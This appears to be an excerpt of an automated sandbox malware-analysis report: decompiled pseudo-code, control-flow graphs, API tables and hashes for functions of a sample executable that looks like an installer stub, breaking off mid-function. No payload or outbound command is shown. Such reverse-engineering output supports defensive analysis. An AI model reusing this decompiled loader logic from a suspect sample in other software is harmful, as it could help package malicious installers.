                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x004066b5
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00000000
                  0x00406828
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x00000000
                  0x0040667d
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                  • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                  0x00405d87
                  0x00405d90
                  0x00000000
                  0x00405d9d
                  0x00405d93
                  0x00000000

                  APIs
                  • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405D87
                  • FindClose.KERNEL32(00000000), ref: 00405D93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID: $B
                  • API String ID: 2295610775-2366330246
                  • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                  • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                  0x00405dab
                  0x00405dae
                  0x00405db5
                  0x00405dbd
                  0x00405dca
                  0x00000000
                  0x00405dd1
                  0x00405dc0
                  0x00405dc8
                  0x00000000
                  0x00000000
                  0x00405dd9

                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc
                  • String ID:
                  • API String ID: 310444273-0
                  • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                  • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 119 403659-403678 call 403897 call 405659 111->119 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->119 126 40367e-403683 119->126 127 4036ff-403707 call 405659 119->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 140 4036be-4036ca lstrlenA 135->140 141 4036af-4036bc call 4055a3 135->141 142 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->142 143 40388d 137->143 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 147 4036f2-4036fa call 405578 call 405a85 140->147 148 4036cc-4036da lstrcmpiA 140->148 141->140 142->138 145 40388f-403896 143->145 147->127 148->147 153 4036dc-4036e6 GetFileAttributesA 148->153 149->145 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 154 4036e8-4036ea 153->154 155 4036ec-4036ed call 4055bf 153->155 154->147 154->155 155->147 169 403886-403888 call 40140b 161->169 170 40386e-403874 161->170 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->145 169->143 170->149 172 40387a-403881 call 40140b 170->172 172->149
                  C-Code - Quality: 96%
                  			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x6d
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                  0x004035e9
                  0x004035f2
                  0x004035f9
                  0x004035fb
                  0x0040360f
                  0x00403621
                  0x0040362b
                  0x00403630
                  0x00403636
                  0x00403649
                  0x00403649
                  0x00403654
                  0x004035fd
                  0x00403608
                  0x00403608
                  0x00403659
                  0x00403663
                  0x0040366c
                  0x00403678
                  0x004036ff
                  0x00403707
                  0x00403710
                  0x00403710
                  0x00403726
                  0x0040372c
                  0x0040373a
                  0x004037c9
                  0x004037d1
                  0x004037db
                  0x004037e0
                  0x004037e6
                  0x00403865
                  0x0040386a
                  0x0040386c
                  0x00403888
                  0x00000000
                  0x00403888
                  0x0040386e
                  0x00403874
                  0x0040387c
                  0x0040387c
                  0x00000000
                  0x00403874
                  0x004037f0
                  0x00403801
                  0x00403803
                  0x00403805
                  0x0040380c
                  0x0040380c
                  0x00403814
                  0x0040381c
                  0x0040381e
                  0x00403820
                  0x00403829
                  0x0040382c
                  0x00403832
                  0x00403832
                  0x00403851
                  0x0040385b
                  0x00000000
                  0x00403860
                  0x004037d3
                  0x004037d5
                  0x00000000
                  0x00403740
                  0x00403740
                  0x00403746
                  0x00403750
                  0x00403758
                  0x00403762
                  0x00403768
                  0x00403776
                  0x0040388d
                  0x0040388d
                  0x00000000
                  0x0040388d
                  0x0040377c
                  0x00403785
                  0x004037c4
                  0x00000000
                  0x004037c4
                  0x0040367e
                  0x0040367e
                  0x00403683
                  0x00000000
                  0x00000000
                  0x0040368d
                  0x0040369d
                  0x004036a2
                  0x004036a9
                  0x00000000
                  0x00000000
                  0x004036ad
                  0x004036af
                  0x004036bc
                  0x004036bc
                  0x004036c4
                  0x004036ca
                  0x004036f2
                  0x004036fa
                  0x00000000
                  0x004036dc
                  0x004036dd
                  0x004036e6
                  0x004036ec
                  0x004036ed
                  0x00000000
                  0x004036ed
                  0x004036e8
                  0x004036ea
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004036ea
                  0x004036ca

                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                  • lstrlenA.KERNEL32(mcchdhqnu,?,?,?,mcchdhqnu,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\kVijllv0Yl.exe" ), ref: 004036BF
                  • lstrcmpiA.KERNEL32(?,.exe,mcchdhqnu,?,?,?,mcchdhqnu,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                  • GetFileAttributesA.KERNEL32(mcchdhqnu), ref: 004036DD
                  • LoadImageA.USER32 ref: 00403726
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  • RegisterClassA.USER32 ref: 0040376D
                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                  • CreateWindowExA.USER32 ref: 004037BE
                  • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                  • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                  • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                  • GetClassInfoA.USER32 ref: 0040381C
                  • GetClassInfoA.USER32 ref: 00403829
                  • RegisterClassA.USER32 ref: 00403832
                  • DialogBoxParamA.USER32 ref: 00403851
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$mcchdhqnu
                  • API String ID: 914957316-114761464
                  • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                  • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 196 402d0f-402d11 192->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 204 402d9d-402da1 199->204 205 402d1f-402d37 call 40571d 199->205 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 209 402da3-402da9 call 402bc5 204->209 210 402daa-402db0 204->210 205->210 223 402d39-402d40 205->223 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->197 225 402e0a-402e10 220->225 223->210 227 402d42-402d49 223->227 225->197 225->201 227->210 230 402d4b-402d52 227->230 228->182 236 402ead-402eb0 229->236 230->210 233 402d54-402d5b 230->233 233->210 235 402d5d-402d7d 233->235 235->197 237 402d83-402d87 235->237 236->197 238 402eb9-402eca 236->238 239 402d89-402d8d 237->239 240 402d8f-402d97 237->240 242 402ed2-402ed7 238->242 243 402ecc 238->243 239->189 239->240 240->210 241 402d99-402d9b 240->241 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                  C-Code - Quality: 96%
                  			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
